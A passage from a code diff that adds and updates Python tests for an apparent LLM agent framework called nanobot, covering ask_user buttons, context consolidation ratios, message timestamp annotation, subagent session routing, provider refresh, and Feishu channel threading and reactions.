and message.get("name") == "ask_user"
|
||||
and message.get("content") == "Skip"
|
||||
for message in session.messages
|
||||
)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_ask_user_keeps_buttons_for_telegram(tmp_path):
|
||||
async def chat_with_retry(**kwargs):
|
||||
return LLMResponse(
|
||||
content="",
|
||||
finish_reason="tool_calls",
|
||||
tool_calls=[
|
||||
ToolCallRequest(
|
||||
id="call_ask",
|
||||
name="ask_user",
|
||||
arguments={
|
||||
"question": "Install the optional package?",
|
||||
"options": ["Install", "Skip"],
|
||||
},
|
||||
)
|
||||
],
|
||||
)
|
||||
|
||||
loop = AgentLoop(
|
||||
bus=MessageBus(),
|
||||
provider=_make_provider(chat_with_retry),
|
||||
workspace=tmp_path,
|
||||
model="test-model",
|
||||
)
|
||||
|
||||
response = await loop._process_message(
|
||||
InboundMessage(channel="telegram", sender_id="user", chat_id="123", content="set it up")
|
||||
)
|
||||
|
||||
assert response is not None
|
||||
assert response.content == "Install the optional package?"
|
||||
assert response.buttons == [["Install", "Skip"]]
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_ask_user_keeps_buttons_for_websocket(tmp_path):
|
||||
async def chat_with_retry(**kwargs):
|
||||
return LLMResponse(
|
||||
content="",
|
||||
finish_reason="tool_calls",
|
||||
tool_calls=[
|
||||
ToolCallRequest(
|
||||
id="call_ask",
|
||||
name="ask_user",
|
||||
arguments={
|
||||
"question": "Install the optional package?",
|
||||
"options": ["Install", "Skip"],
|
||||
},
|
||||
)
|
||||
],
|
||||
)
|
||||
|
||||
loop = AgentLoop(
|
||||
bus=MessageBus(),
|
||||
provider=_make_provider(chat_with_retry),
|
||||
workspace=tmp_path,
|
||||
model="test-model",
|
||||
)
|
||||
|
||||
response = await loop._process_message(
|
||||
InboundMessage(channel="websocket", sender_id="user", chat_id="123", content="set it up")
|
||||
)
|
||||
|
||||
assert response is not None
|
||||
assert response.content == "Install the optional package?"
|
||||
assert response.buttons == [["Install", "Skip"]]
|
||||
108
tests/agent/test_consolidation_ratio.py
Normal file
108
tests/agent/test_consolidation_ratio.py
Normal file
@ -0,0 +1,108 @@
|
||||
"""Tests for configurable consolidation_ratio."""
|
||||
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
|
||||
import pytest
|
||||
from pydantic import ValidationError
|
||||
|
||||
import nanobot.agent.memory as memory_module
|
||||
from nanobot.agent.loop import AgentLoop
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.config.schema import AgentDefaults
|
||||
from nanobot.providers.base import GenerationSettings, LLMResponse
|
||||
|
||||
|
||||
def _make_loop(
|
||||
tmp_path,
|
||||
*,
|
||||
estimated_tokens: int = 0,
|
||||
context_window_tokens: int = 200,
|
||||
consolidation_ratio: float = 0.5,
|
||||
) -> AgentLoop:
|
||||
provider = MagicMock()
|
||||
provider.get_default_model.return_value = "test-model"
|
||||
provider.generation = GenerationSettings(max_tokens=0)
|
||||
provider.estimate_prompt_tokens.return_value = (estimated_tokens, "test-counter")
|
||||
_response = LLMResponse(content="ok", tool_calls=[])
|
||||
provider.chat_with_retry = AsyncMock(return_value=_response)
|
||||
provider.chat_stream_with_retry = AsyncMock(return_value=_response)
|
||||
|
||||
loop = AgentLoop(
|
||||
bus=MessageBus(),
|
||||
provider=provider,
|
||||
workspace=tmp_path,
|
||||
model="test-model",
|
||||
context_window_tokens=context_window_tokens,
|
||||
consolidation_ratio=consolidation_ratio,
|
||||
)
|
||||
loop.tools.get_definitions = MagicMock(return_value=[])
|
||||
loop.consolidator._SAFETY_BUFFER = 0
|
||||
return loop
|
||||
|
||||
|
||||
def _session_with_turns(loop: AgentLoop, *, turns: int):
|
||||
session = loop.sessions.get_or_create("cli:test")
|
||||
session.messages = []
|
||||
for i in range(turns):
|
||||
session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"})
|
||||
session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:01:{i:02d}"})
|
||||
loop.sessions.save(session)
|
||||
return session
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
@pytest.mark.parametrize(
|
||||
("ratio", "context_window_tokens", "estimates", "expected_archives"),
|
||||
[
|
||||
(0.5, 200, [250, 90], 1),
|
||||
(0.1, 1000, [1200, 800, 400, 50], 2),
|
||||
(0.9, 200, [300, 175], 1),
|
||||
],
|
||||
)
|
||||
async def test_consolidation_ratio_controls_target(
|
||||
tmp_path,
|
||||
monkeypatch,
|
||||
ratio: float,
|
||||
context_window_tokens: int,
|
||||
estimates: list[int],
|
||||
expected_archives: int,
|
||||
) -> None:
|
||||
loop = _make_loop(
|
||||
tmp_path,
|
||||
context_window_tokens=context_window_tokens,
|
||||
consolidation_ratio=ratio,
|
||||
)
|
||||
loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign]
|
||||
session = _session_with_turns(loop, turns=10)
|
||||
|
||||
remaining_estimates = list(estimates)
|
||||
|
||||
def mock_estimate(_session, *, session_summary=None):
|
||||
assert session_summary is None
|
||||
return (remaining_estimates.pop(0), "test")
|
||||
|
||||
loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign]
|
||||
monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100)
|
||||
|
||||
await loop.consolidator.maybe_consolidate_by_tokens(session)
|
||||
|
||||
assert loop.consolidator.archive.await_count == expected_archives
|
||||
|
||||
|
||||
def test_ratio_propagated_from_config_schema() -> None:
|
||||
defaults = AgentDefaults()
|
||||
assert defaults.consolidation_ratio == 0.5
|
||||
|
||||
defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3})
|
||||
assert defaults.consolidation_ratio == 0.3
|
||||
|
||||
dumped = defaults.model_dump(by_alias=True)
|
||||
assert dumped["consolidationRatio"] == 0.3
|
||||
|
||||
|
||||
def test_ratio_validation_rejects_out_of_range() -> None:
|
||||
with pytest.raises(ValidationError):
|
||||
AgentDefaults(consolidation_ratio=0.05)
|
||||
|
||||
with pytest.raises(ValidationError):
|
||||
AgentDefaults(consolidation_ratio=1.0)
|
||||
@ -188,6 +188,17 @@ def test_identity_has_no_behavioral_instructions(tmp_path) -> None:
|
||||
assert "Execution Rules" not in identity
|
||||
|
||||
|
||||
def test_system_prompt_does_not_warn_about_message_time_markers(tmp_path) -> None:
|
||||
"""Parroting is prevented by not annotating assistant turns in history;
|
||||
no prompt-level warning about ``[Message Time: ...]`` is needed."""
|
||||
workspace = _make_workspace(tmp_path)
|
||||
builder = ContextBuilder(workspace)
|
||||
|
||||
prompt = builder.build_system_prompt()
|
||||
|
||||
assert "Message Time" not in prompt
|
||||
|
||||
|
||||
def test_default_soul_template_contains_execution_rules() -> None:
|
||||
"""Default SOUL.md template must contain execution rules with act/plan layering."""
|
||||
soul = (pkg_files("nanobot") / "templates" / "SOUL.md").read_text(encoding="utf-8")
|
||||
|
||||
@ -535,7 +535,14 @@ async def test_system_subagent_followup_is_persisted_before_prompt_assembly(tmp_
|
||||
)
|
||||
|
||||
non_system = [m for m in seen["initial_messages"] if m.get("role") != "system"]
|
||||
assert [m["content"] for m in non_system[:2]] == ["question", "working"]
|
||||
assert "question" in non_system[0]["content"]
|
||||
assert "working" in non_system[1]["content"]
|
||||
# User turns carry the timestamp prefix so the model can reason about
|
||||
# relative time. Assistant turns do NOT, otherwise the model treats those
|
||||
# past replies as in-context examples and starts its own outputs with
|
||||
# ``[Message Time: ...]`` (which then leaks back to the user).
|
||||
assert "[Message Time:" in non_system[0]["content"]
|
||||
assert "[Message Time:" not in non_system[1]["content"]
|
||||
assert non_system[2]["content"].count("subagent result") == 1
|
||||
assert "Current Time:" in non_system[2]["content"]
|
||||
|
||||
@ -657,3 +664,63 @@ def test_subagent_followup_skips_empty_content() -> None:
|
||||
|
||||
assert loop._persist_subagent_followup(session, msg) is False
|
||||
assert session.messages == []
|
||||
|
||||
|
||||
def test_set_tool_context_passes_thread_session_key_to_spawn(tmp_path: Path) -> None:
|
||||
loop = _make_full_loop(tmp_path)
|
||||
|
||||
loop._set_tool_context(
|
||||
"slack",
|
||||
"C123",
|
||||
metadata={"slack": {"thread_ts": "1700.42", "channel_type": "channel"}},
|
||||
session_key="slack:C123:1700.42",
|
||||
)
|
||||
|
||||
spawn_tool = loop.tools.get("spawn")
|
||||
assert spawn_tool is not None
|
||||
assert spawn_tool._session_key.get() == "slack:C123:1700.42"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_system_subagent_followup_uses_thread_session_and_slack_metadata(tmp_path: Path) -> None:
|
||||
loop = _make_full_loop(tmp_path)
|
||||
loop.consolidator.maybe_consolidate_by_tokens = AsyncMock(return_value=False) # type: ignore[method-assign]
|
||||
|
||||
thread_session = loop.sessions.get_or_create("slack:C123:1700.42")
|
||||
thread_session.add_message("user", "thread question")
|
||||
loop.sessions.save(thread_session)
|
||||
|
||||
seen: dict[str, list[dict]] = {}
|
||||
|
||||
async def fake_run_agent_loop(initial_messages, **_kwargs):
|
||||
seen["initial_messages"] = initial_messages
|
||||
return (
|
||||
"done",
|
||||
[],
|
||||
[*initial_messages, {"role": "assistant", "content": "done"}],
|
||||
"stop",
|
||||
False,
|
||||
)
|
||||
|
||||
loop._run_agent_loop = fake_run_agent_loop # type: ignore[method-assign]
|
||||
|
||||
outbound = await loop._process_message(
|
||||
InboundMessage(
|
||||
channel="system",
|
||||
sender_id="subagent",
|
||||
chat_id="slack:C123",
|
||||
content="subagent result",
|
||||
session_key_override="slack:C123:1700.42",
|
||||
metadata={"subagent_task_id": "sub-1"},
|
||||
)
|
||||
)
|
||||
|
||||
assert outbound is not None
|
||||
assert outbound.channel == "slack"
|
||||
assert outbound.chat_id == "C123"
|
||||
assert outbound.metadata == {"slack": {"thread_ts": "1700.42"}}
|
||||
assert "thread question" in seen["initial_messages"][1]["content"]
|
||||
|
||||
loop.sessions.invalidate("slack:C123:1700.42")
|
||||
persisted = loop.sessions.get_or_create("slack:C123:1700.42")
|
||||
assert any(m.get("subagent_task_id") == "sub-1" for m in persisted.messages)
|
||||
|
||||
90
tests/agent/test_loop_tool_context.py
Normal file
90
tests/agent/test_loop_tool_context.py
Normal file
@ -0,0 +1,90 @@
|
||||
from pathlib import Path
|
||||
from unittest.mock import MagicMock
|
||||
|
||||
import pytest
|
||||
|
||||
from nanobot.agent.loop import AgentLoop
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.providers.base import LLMResponse, ToolCallRequest
|
||||
|
||||
|
||||
class _ContextRecordingTool:
|
||||
name = "cron"
|
||||
concurrency_safe = False
|
||||
|
||||
def __init__(self) -> None:
|
||||
self.contexts: list[dict] = []
|
||||
|
||||
def set_context(
|
||||
self,
|
||||
channel: str,
|
||||
chat_id: str,
|
||||
metadata: dict | None = None,
|
||||
session_key: str | None = None,
|
||||
) -> None:
|
||||
self.contexts.append({
|
||||
"channel": channel,
|
||||
"chat_id": chat_id,
|
||||
"metadata": metadata,
|
||||
"session_key": session_key,
|
||||
})
|
||||
|
||||
async def execute(self, **_kwargs) -> str:
|
||||
return "created"
|
||||
|
||||
|
||||
class _Tools:
|
||||
def __init__(self, tool: _ContextRecordingTool) -> None:
|
||||
self.tool = tool
|
||||
|
||||
def get(self, name: str):
|
||||
return self.tool if name == "cron" else None
|
||||
|
||||
def get_definitions(self) -> list:
|
||||
return []
|
||||
|
||||
def prepare_call(self, name: str, arguments: dict):
|
||||
return (self.tool, arguments, None) if name == "cron" else (None, arguments, None)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_loop_hook_preserves_metadata_when_resetting_tool_context(tmp_path: Path) -> None:
|
||||
provider = MagicMock()
|
||||
calls = {"n": 0}
|
||||
|
||||
async def chat_with_retry(**_kwargs):
|
||||
calls["n"] += 1
|
||||
if calls["n"] == 1:
|
||||
return LLMResponse(
|
||||
content=None,
|
||||
tool_calls=[ToolCallRequest(id="call_1", name="cron", arguments={"action": "add"})],
|
||||
)
|
||||
return LLMResponse(content="done", tool_calls=[])
|
||||
|
||||
provider.chat_with_retry = chat_with_retry
|
||||
provider.get_default_model.return_value = "test-model"
|
||||
|
||||
loop = AgentLoop(
|
||||
bus=MessageBus(),
|
||||
provider=provider,
|
||||
workspace=tmp_path,
|
||||
model="test-model",
|
||||
)
|
||||
cron = _ContextRecordingTool()
|
||||
loop.tools = _Tools(cron)
|
||||
|
||||
metadata = {"slack": {"thread_ts": "111.222", "channel_type": "channel"}}
|
||||
await loop._run_agent_loop(
|
||||
[],
|
||||
channel="slack",
|
||||
chat_id="C123",
|
||||
metadata=metadata,
|
||||
session_key="slack:C123:111.222",
|
||||
)
|
||||
|
||||
assert cron.contexts[-1] == {
|
||||
"channel": "slack",
|
||||
"chat_id": "C123",
|
||||
"metadata": metadata,
|
||||
"session_key": "slack:C123:111.222",
|
||||
}
|
||||
@ -1060,11 +1060,10 @@ async def test_next_turn_after_llm_error_keeps_turn_boundary(tmp_path):
|
||||
|
||||
request_messages = provider.chat_with_retry.await_args_list[1].kwargs["messages"]
|
||||
non_system = [message for message in request_messages if message.get("role") != "system"]
|
||||
assert non_system[0] == {"role": "user", "content": "first question"}
|
||||
assert non_system[1] == {
|
||||
"role": "assistant",
|
||||
"content": _PERSISTED_MODEL_ERROR_PLACEHOLDER,
|
||||
}
|
||||
assert non_system[0]["role"] == "user"
|
||||
assert "first question" in non_system[0]["content"]
|
||||
assert non_system[1]["role"] == "assistant"
|
||||
assert _PERSISTED_MODEL_ERROR_PLACEHOLDER in non_system[1]["content"]
|
||||
assert non_system[2]["role"] == "user"
|
||||
assert "second question" in non_system[2]["content"]
|
||||
|
||||
|
||||
49
tests/agent/test_runtime_refresh.py
Normal file
49
tests/agent/test_runtime_refresh.py
Normal file
@ -0,0 +1,49 @@
|
||||
from pathlib import Path
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock
|
||||
|
||||
from nanobot.agent.loop import AgentLoop
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.providers.factory import ProviderSnapshot
|
||||
|
||||
|
||||
def _provider(default_model: str, max_tokens: int = 123) -> MagicMock:
|
||||
provider = MagicMock()
|
||||
provider.get_default_model.return_value = default_model
|
||||
provider.generation = SimpleNamespace(max_tokens=max_tokens)
|
||||
return provider
|
||||
|
||||
|
||||
def test_provider_refresh_updates_all_model_dependents(tmp_path: Path) -> None:
|
||||
old_provider = _provider("old-model")
|
||||
new_provider = _provider("new-model", max_tokens=456)
|
||||
loop = AgentLoop(
|
||||
bus=MessageBus(),
|
||||
provider=old_provider,
|
||||
workspace=tmp_path,
|
||||
model="old-model",
|
||||
context_window_tokens=1000,
|
||||
provider_snapshot_loader=lambda: ProviderSnapshot(
|
||||
provider=new_provider,
|
||||
model="new-model",
|
||||
context_window_tokens=2000,
|
||||
signature=("new-model",),
|
||||
),
|
||||
)
|
||||
|
||||
loop._refresh_provider_snapshot()
|
||||
|
||||
assert loop.provider is new_provider
|
||||
assert loop.model == "new-model"
|
||||
assert loop.context_window_tokens == 2000
|
||||
assert loop.runner.provider is new_provider
|
||||
assert loop.subagents.provider is new_provider
|
||||
assert loop.subagents.model == "new-model"
|
||||
assert loop.subagents.runner.provider is new_provider
|
||||
assert loop.consolidator.provider is new_provider
|
||||
assert loop.consolidator.model == "new-model"
|
||||
assert loop.consolidator.context_window_tokens == 2000
|
||||
assert loop.consolidator.max_completion_tokens == 456
|
||||
assert loop.dream.provider is new_provider
|
||||
assert loop.dream.model == "new-model"
|
||||
assert loop.dream._runner.provider is new_provider
|
||||
@ -194,6 +194,87 @@ def test_get_history_preserves_reasoning_content():
|
||||
]
|
||||
|
||||
|
||||
def test_get_history_annotates_user_turns_but_not_assistant_turns():
|
||||
"""Only user turns carry the timestamp prefix.
|
||||
|
||||
Annotating assistant turns trains the model (via in-context examples) to
|
||||
start its own replies with ``[Message Time: ...]``. User-side stamps are
|
||||
enough to pin adjacent assistant replies for relative-time reasoning.
|
||||
"""
|
||||
session = Session(key="test:timestamps")
|
||||
session.messages.append({
|
||||
"role": "user",
|
||||
"content": "10 点提醒是昨天发生的",
|
||||
"timestamp": "2026-04-26T22:00:00",
|
||||
})
|
||||
session.messages.append({
|
||||
"role": "assistant",
|
||||
"content": "记下来了",
|
||||
"timestamp": "2026-04-26T22:00:05",
|
||||
})
|
||||
|
||||
history = session.get_history(max_messages=500, include_timestamps=True)
|
||||
|
||||
assert history == [
|
||||
{
|
||||
"role": "user",
|
||||
"content": "[Message Time: 2026-04-26T22:00:00]\n10 点提醒是昨天发生的",
|
||||
},
|
||||
{
|
||||
"role": "assistant",
|
||||
"content": "记下来了",
|
||||
},
|
||||
]
|
||||
|
||||
|
||||
def test_get_history_annotates_proactive_assistant_deliveries_with_timestamps():
|
||||
"""Cron / heartbeat assistant pushes still carry a timestamp prefix.
|
||||
|
||||
These proactive deliveries can sit hours away from the next user reply,
|
||||
so the model needs to know when they fired. They are rare enough that
|
||||
they don't act as in-context demonstrations encouraging the model to
|
||||
prefix its own normal replies with ``[Message Time: ...]``.
|
||||
"""
|
||||
session = Session(key="test:proactive-timestamps")
|
||||
session.messages.append({
|
||||
"role": "assistant",
|
||||
"content": "记得喝水",
|
||||
"timestamp": "2026-04-26T15:00:00",
|
||||
"_channel_delivery": True,
|
||||
})
|
||||
session.messages.append({
|
||||
"role": "user",
|
||||
"content": "好",
|
||||
"timestamp": "2026-04-26T18:00:00",
|
||||
})
|
||||
|
||||
history = session.get_history(max_messages=500, include_timestamps=True)
|
||||
|
||||
assert history == [
|
||||
{
|
||||
"role": "assistant",
|
||||
"content": "[Message Time: 2026-04-26T15:00:00]\n记得喝水",
|
||||
},
|
||||
{
|
||||
"role": "user",
|
||||
"content": "[Message Time: 2026-04-26T18:00:00]\n好",
|
||||
},
|
||||
]
|
||||
|
||||
|
||||
def test_get_history_does_not_annotate_tool_results_with_timestamps():
|
||||
session = Session(key="test:tool-timestamps")
|
||||
session.messages.append({"role": "user", "content": "run tool"})
|
||||
session.messages.extend(_tool_turn("ts", 0))
|
||||
session.messages[-1]["timestamp"] = "2026-04-26T22:00:10"
|
||||
|
||||
history = session.get_history(max_messages=500, include_timestamps=True)
|
||||
|
||||
tool_result = history[-1]
|
||||
assert tool_result["role"] == "tool"
|
||||
assert tool_result["content"] == "ok"
|
||||
|
||||
|
||||
# --- Window cuts mid-group: assistant present but some tool results orphaned ---
|
||||
|
||||
def test_window_cuts_mid_tool_group():
|
||||
|
||||
@ -1,6 +1,6 @@
|
||||
"""Tests for Feishu reaction add/remove and auto-cleanup on stream end."""
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
from unittest.mock import AsyncMock, MagicMock
|
||||
|
||||
import pytest
|
||||
|
||||
@ -160,19 +160,38 @@ class TestRemoveReactionAsync:
|
||||
|
||||
|
||||
class TestStreamEndReactionCleanup:
|
||||
@pytest.mark.asyncio
|
||||
async def test_stream_buffers_are_scoped_by_message_id(self):
|
||||
ch = _make_channel()
|
||||
ch._create_streaming_card_sync = MagicMock(return_value=None)
|
||||
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "first",
|
||||
metadata={"message_id": "om_first"},
|
||||
)
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "second",
|
||||
metadata={"message_id": "om_second"},
|
||||
)
|
||||
|
||||
assert ch._stream_bufs["om_first"].text == "first"
|
||||
assert ch._stream_bufs["om_second"].text == "second"
|
||||
assert "oc_chat1" not in ch._stream_bufs
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_removes_reaction_on_stream_end(self):
|
||||
ch = _make_channel()
|
||||
ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf(
|
||||
text="Done", card_id="card_1", sequence=3, last_edit=0.0,
|
||||
)
|
||||
ch._reaction_ids["om_001"] = "rx_42"
|
||||
ch._client.cardkit.v1.card_element.content.return_value = MagicMock(success=MagicMock(return_value=True))
|
||||
ch._client.cardkit.v1.card.settings.return_value = MagicMock(success=MagicMock(return_value=True))
|
||||
ch._remove_reaction = AsyncMock()
|
||||
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "",
|
||||
metadata={"_stream_end": True, "message_id": "om_001", "reaction_id": "rx_42"},
|
||||
metadata={"_stream_end": True, "message_id": "om_001"},
|
||||
)
|
||||
|
||||
ch._remove_reaction.assert_called_once_with("om_001", "rx_42")
|
||||
@ -189,7 +208,7 @@ class TestStreamEndReactionCleanup:
|
||||
|
||||
await ch.send_delta(
|
||||
"oc_chat1", "",
|
||||
metadata={"_stream_end": True, "reaction_id": "rx_42"},
|
||||
metadata={"_stream_end": True},
|
||||
)
|
||||
|
||||
ch._remove_reaction.assert_not_called()
|
||||
|
||||
@ -3,7 +3,7 @@ import asyncio
|
||||
import json
|
||||
from pathlib import Path
|
||||
from types import SimpleNamespace
|
||||
from unittest.mock import MagicMock, patch
|
||||
from unittest.mock import AsyncMock, MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
@ -21,18 +21,18 @@ from nanobot.bus.events import OutboundMessage
|
||||
from nanobot.bus.queue import MessageBus
|
||||
from nanobot.channels.feishu import FeishuChannel, FeishuConfig
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def _make_feishu_channel(reply_to_message: bool = False) -> FeishuChannel:
|
||||
def _make_feishu_channel(reply_to_message: bool = False, group_policy: str = "mention") -> FeishuChannel:
|
||||
config = FeishuConfig(
|
||||
enabled=True,
|
||||
app_id="cli_test",
|
||||
app_secret="secret",
|
||||
allow_from=["*"],
|
||||
reply_to_message=reply_to_message,
|
||||
group_policy=group_policy,
|
||||
)
|
||||
channel = FeishuChannel(config, MessageBus())
|
||||
channel._client = MagicMock()
|
||||
@ -443,3 +443,288 @@ async def test_on_message_no_extra_api_call_when_no_parent_id() -> None:
|
||||
|
||||
channel._client.im.v1.message.get.assert_not_called()
|
||||
assert len(captured) == 1
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Session key derivation tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_session_key_group_with_root_id_is_thread_scoped() -> None:
|
||||
"""Group message with root_id gets a thread-scoped session key."""
|
||||
channel = _make_feishu_channel(group_policy="open")
|
||||
bus_spy = []
|
||||
original_publish = channel.bus.publish_inbound
|
||||
|
||||
async def capture(msg):
|
||||
bus_spy.append(msg)
|
||||
await original_publish(msg)
|
||||
|
||||
channel.bus.publish_inbound = capture
|
||||
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||
channel.transcribe_audio = AsyncMock(return_value="")
|
||||
channel._add_reaction = AsyncMock(return_value=None)
|
||||
|
||||
event = _make_feishu_event(
|
||||
chat_type="group",
|
||||
content='{"text": "hello"}',
|
||||
root_id="om_root123",
|
||||
message_id="om_child456",
|
||||
)
|
||||
await channel._on_message(event)
|
||||
|
||||
assert len(bus_spy) == 1
|
||||
assert bus_spy[0].session_key == "feishu:oc_abc:om_root123"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_session_key_group_no_root_id_uses_message_id() -> None:
|
||||
"""Group message without root_id gets session keyed by message_id (per-message session)."""
|
||||
channel = _make_feishu_channel(group_policy="open")
|
||||
bus_spy = []
|
||||
original_publish = channel.bus.publish_inbound
|
||||
|
||||
async def capture(msg):
|
||||
bus_spy.append(msg)
|
||||
await original_publish(msg)
|
||||
|
||||
channel.bus.publish_inbound = capture
|
||||
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||
channel.transcribe_audio = AsyncMock(return_value="")
|
||||
channel._add_reaction = AsyncMock(return_value=None)
|
||||
|
||||
event = _make_feishu_event(
|
||||
chat_type="group",
|
||||
content='{"text": "hello"}',
|
||||
root_id=None,
|
||||
message_id="om_001",
|
||||
)
|
||||
await channel._on_message(event)
|
||||
|
||||
assert len(bus_spy) == 1
|
||||
assert bus_spy[0].session_key == "feishu:oc_abc:om_001"
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_session_key_private_chat_no_override() -> None:
|
||||
"""Private chat never overrides session key (consistent with Telegram/Slack)."""
|
||||
channel = _make_feishu_channel()
|
||||
bus_spy = []
|
||||
original_publish = channel.bus.publish_inbound
|
||||
|
||||
async def capture(msg):
|
||||
bus_spy.append(msg)
|
||||
await original_publish(msg)
|
||||
|
||||
channel.bus.publish_inbound = capture
|
||||
channel._download_and_save_media = AsyncMock(return_value=(None, ""))
|
||||
channel.transcribe_audio = AsyncMock(return_value="")
|
||||
channel._add_reaction = AsyncMock(return_value=None)
|
||||
|
||||
event = _make_feishu_event(
|
||||
chat_type="p2p",
|
||||
content='{"text": "hello"}',
|
||||
root_id=None,
|
||||
message_id="om_001",
|
||||
)
|
||||
await channel._on_message(event)
|
||||
|
||||
assert len(bus_spy) == 1
|
||||
assert bus_spy[0].session_key_override is None
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# reply_in_thread tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_uses_reply_in_thread_when_enabled() -> None:
|
||||
"""When reply_to_message is True, reply includes reply_in_thread=True."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
assert request.request_body.reply_in_thread is True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_without_reply_in_thread_when_disabled() -> None:
|
||||
"""When reply_to_message is False, reply does NOT use reply_in_thread."""
|
||||
channel = _make_feishu_channel(reply_to_message=False)
|
||||
|
||||
create_resp = MagicMock()
|
||||
create_resp.success.return_value = True
|
||||
channel._client.im.v1.message.create.return_value = create_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
))
|
||||
|
||||
# No message_id in metadata → no reply attempt, direct create
|
||||
channel._client.im.v1.message.create.assert_called_once()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_keeps_fallback_when_reply_fails() -> None:
|
||||
"""Even with reply_to_message=True, fallback to create on reply failure."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = False
|
||||
reply_resp.code = 99991400
|
||||
reply_resp.msg = "rate limited"
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
create_resp = MagicMock()
|
||||
create_resp.success.return_value = True
|
||||
channel._client.im.v1.message.create.return_value = create_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called()
|
||||
channel._client.im.v1.message.create.assert_called()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_no_reply_in_thread_for_p2p_chat() -> None:
|
||||
"""reply_in_thread should NOT be set for p2p chats (identified by chat_type)."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc", # p2p chats also use oc_ prefix
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001", "chat_type": "p2p"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
assert request.request_body.reply_in_thread is not True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_uses_reply_in_thread_for_group_chat() -> None:
|
||||
"""reply_in_thread should be True for group chats (identified by chat_type)."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
||||
metadata={"message_id": "om_001", "chat_type": "group"},
|
||||
))
|
||||
|
||||
channel._client.im.v1.message.reply.assert_called_once()
|
||||
call_args = channel._client.im.v1.message.reply.call_args
|
||||
request = call_args[0][0]
|
||||
assert request.request_body.reply_in_thread is True
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_reply_targets_message_id_when_in_topic() -> None:
|
||||
"""When inbound message is inside a topic (root_id != message_id),
|
||||
the reply should target the inbound message_id (not root_id).
|
||||
The Feishu Reply API keeps the response in the same topic
|
||||
automatically when the target message is already inside a topic."""
|
||||
channel = _make_feishu_channel(reply_to_message=True)
|
||||
|
||||
reply_resp = MagicMock()
|
||||
reply_resp.success.return_value = True
|
||||
channel._client.im.v1.message.reply.return_value = reply_resp
|
||||
|
||||
await channel.send(OutboundMessage(
|
||||
channel="feishu",
|
||||
chat_id="oc_abc",
|
||||
content="hello",
|
